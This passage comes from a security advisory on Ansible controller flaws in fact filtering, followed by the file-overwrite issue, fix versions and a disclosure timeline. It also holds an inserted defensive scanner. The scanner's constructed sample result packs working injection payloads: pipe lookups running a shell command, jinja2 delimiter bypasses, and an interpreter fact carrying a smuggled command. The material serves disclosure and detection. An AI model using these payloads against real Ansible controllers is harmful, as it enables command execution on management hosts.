# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/callback/default.py#L208
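As an added defensive example (not Computest's PoC and not Ansible's own filtering code), the following Python scans the JSON result a managed host returns for the six bypass patterns and the verbosity override described above. The sample result, the fact names it uses and the host name "controller" are constructed for this example.

```python
"""Scanner for the JSON result a managed host returns to the Ansible controller.
Added example, not Computest's PoC and not Ansible's own filtering code; fact
names, the host name "controller" and the sample result are constructed."""
import json
import re

# Facts that let a remote host steer where and how the controller executes.
MAGIC_FACTS = {"ansible_python_interpreter", "ansible_connection",
               "ansible_become", "ansible_host", "_ansible_verbose_override"}
IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
JINJA = re.compile(r"\{\{|\{%")
# A quoted brace such as '{' that whitelisted Python can multiply into "{{".
QUOTED_BRACE = re.compile(r"""['"][{}]['"]""")

def _check_key(path, key, findings):
    if key in MAGIC_FACTS:                      # bypass #1 (host_vars), #3 (stat)
        findings.append((path, "magic fact set by remote host"))
    if not IDENT.match(key):                    # bypass #2 (conditional as name)
        findings.append((path, "fact name is not an identifier"))
    if JINJA.search(key):                       # bypass #5 (template in key)
        findings.append((path, "jinja delimiters in dict key"))

def _check_string(path, value, findings):
    if "#jinja2:" in value:                     # bypass #4 (syntax override)
        findings.append((path, "jinja2 syntax override header"))
    if JINJA.search(value):
        findings.append((path, "jinja delimiters in string"))
    if "lookup(" in value:
        findings.append((path, "lookup() call in fact value"))
    # Strings starting with "[" or "{" are handed to safe_eval (bypass #6).
    if value.lstrip()[:1] in ("[", "{") and QUOTED_BRACE.search(value):
        findings.append((path, "safe_eval string rebuilding jinja delimiters"))

def _walk(node, path, findings):
    if isinstance(node, dict):
        for key, child in node.items():
            key = str(key)
            child_path = f"{path}.{key}" if path else key
            _check_key(child_path, key, findings)
            _walk(child, child_path, findings)
    elif isinstance(node, list):
        for i, child in enumerate(node):
            _walk(child, f"{path}[{i}]", findings)
    elif isinstance(node, str):
        _check_string(path, node, findings)

def scan_result(result):
    """Return (path, reason) findings for one decoded module result."""
    findings = []
    _walk(result, "", findings)
    return findings

def scan_json(text):
    """Decode the raw JSON a host returned and scan it."""
    return scan_result(json.loads(text))

# Constructed sample that packs every bypass from the advisory into one reply.
PAYLOAD = "touch /tmp/foobarbaz"
LOOKUP = "lookup('pipe', '%s')" % PAYLOAD
SAMPLE_RESULT_JSON = json.dumps({
    "changed": False,
    "ansible_facts": {
        "ansible_os_family == 'Debian'": LOOKUP,
        "ansible_os_family": {"{{ %s }}" % LOOKUP: ""},
        "ansible_distribution": "#jinja2:variable_start_string:'[['\n{{}}\n[[%s]]" % LOOKUP,
        "ansible_kernel": """[ '{'*2 + "%s" + '}'*2 ]""" % LOOKUP,
    },
    "stat": {"checksum": {"ansible_facts": {"ansible_connection": "local"}}},
    "add_host": {"host_name": "controller",
                 "host_vars": {"ansible_python_interpreter": "%s; echo {}" % PAYLOAD}},
    "_ansible_verbose_override": 0,
})

if __name__ == "__main__":
    for path, reason in scan_json(SAMPLE_RESULT_JSON):
        print(f"{path}: {reason}")
```

A clean result (plain identifier fact names, no template syntax, no magic facts) produces no findings, so the scanner can gate results before they reach the controller's variable manager.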
		

Issue: Overwriting files
------------------------
Roles usually contain custom facts that are defined in defaults/main.yml,
intending to be overwritten by the inventory (with group and host vars). These
facts can be overwritten by the remote host, due to the variable precedence [1].
Some of these facts may be used to specify the location of a file that will be
copied to the remote host. The attacker may change it to /etc/passwd. The
opposite is also true, he may be able to overwrite files on the Controller. One
example is the usage of a password lookup where the filename contains a
variable [2].

[1] http://docs.ansible.com/ansible/playbooks_variables.html#variable-precedence-where-should-i-put-a-variable
[2] http://docs.ansible.com/ansible/playbooks_lookups.html#the-password-lookup

Mitigation
----------
Computest is not aware of mitigations short of installing fixed versions of the
software.

Resolution
----------
Ansible has released new versions that fix the vulnerabilities described in
this advisory: version 2.1.4 for the 2.1 branch and 2.2.1 for the 2.2 branch.

Conclusion
----------
The handling of Facts in Ansible suffers from too many special cases that allow
for the bypassing of filtering. We found these issues in just hours of code
review, which can be interpreted as a sign of very poor security. However, we
don't believe this is the case.

The attack surface of the Controller is very small, as it consists mainly of the
Facts. We believe that it is very well possible to solve the filtering and
quoting of Facts in a sound way, and that when this has been done, the
opportunity for attack in this threat model is very small. 

Furthermore, the Ansible security team has been understanding and professional
in their communication around this issue, which is a good sign for the handling
of future issues.

Timeline
--------
2016-12-08	First contact with Ansible security team
2016-12-09	First contact with Redhat security team (secalert@redhat.com)
2016-12-09	Submitted PoC and description to security@ansible.com
2016-12-13	Ansible confirms issue and severity
2016-12-15	Ansible informs us of intent to disclose after holidays
2017-01-05	Ansible informs us of disclosure date and fix versions
2017-01-09	Ansible issues fixed version